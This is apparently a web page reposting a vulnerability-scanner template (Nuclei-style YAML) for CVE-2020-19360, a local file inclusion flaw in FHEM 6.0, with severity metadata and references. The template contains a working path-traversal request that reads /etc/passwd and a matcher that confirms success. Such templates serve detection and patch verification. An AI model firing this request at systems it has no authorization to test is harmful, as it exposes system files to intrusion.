CVE-2020-19360: FHEM 6.0 - Local File Inclusion

2025-08-01 FHEM PoC Public

Description

FHEM version 6.0 suffers from a local file inclusion vulnerability.

PoC

id: CVE-2020-19360

info:
  name: FHEM 6.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
  remediation: |
    Apply the latest patch or upgrade to a version that is not affected by the vulnerability.
  reference:
    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
    - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
    - https://nvd.nist.gov/vuln/detail/CVE-2020-19360
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-19360
    cwe-id: CWE-22
    epss-score: 0.17278
    epss-percentile: 0.96944
    cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fhem
    product: fhem
  tags: cve,cve2020,fhem,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac988efc76a1cc8e4e6d7b4ac2f7d43041fe2fc34a976e61b7e740274bd58efc0220087828dc58cbd09e31792c483cbc2589de828779fdd4d316d31288fc011bbfeb:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities